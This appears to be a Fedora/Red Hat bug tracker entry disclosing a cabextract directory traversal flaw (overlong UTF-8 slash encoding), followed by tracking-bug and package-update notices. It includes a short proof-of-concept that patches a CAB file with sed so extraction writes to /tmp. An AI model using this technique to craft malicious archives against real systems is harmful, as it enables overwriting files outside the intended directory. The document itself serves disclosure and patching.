It was reported [1] that cabextract is susceptible to a directory traversal vulnerability. While extracting files from an archive, it removes leading slashes from filenames but does it before possibly decoding UTF-8 and doesn't check for invalid UTF-8. Hence an absolute filename can be shoved through by using overlong encoding for the leading slash (and setting utf8 attribute in the header). This can be exploited by a malicious archive to write files outside the current directory. Illustration: $ touch xxxxxxxxxx $ lcab xxxxxxxxxx test.cab $ sed -i 's|\x20\x00xxxxxxxxxx|\xa0\x00\xe0\x80\xaftmp/abs|g' test.cab $ rm xxxxxxxxxx $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ ./cabextract test.cab Extracting cabinet: test.cab extracting /tmp/abs All done, no errors. $ ls /tmp/abs /tmp/abs In the sed command above, \xe0\x80\xaf is an overlong encoding for '/', \xa0\x00 are flags updated to include utf-8 flag. The issue was found in cabextract 1.4 and 2-byte encoding (\xc0\xaf) was enough to hide '/'. cabextract 1.5 tightened utf-8 checks and 3-byte encoding is now necessary. The issue was reported to Stuart Caie today and fixed in less than 4h: http://sourceforge.net/p/libmspack/code/217/ Another release of cabextract is expected in the next few days. [1]: http://seclists.org/oss-sec/2015/q1/587
Created cabextract tracking bugs for this issue: Affects: fedora-all [bug 1193955] Affects: epel-all [bug 1193956]
cabextract-1.5-1.fc21 has been pushed to the Fedora 21 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el7 has been pushed to the Fedora EPEL 7 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.
cabextract-1.5-1.el5 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.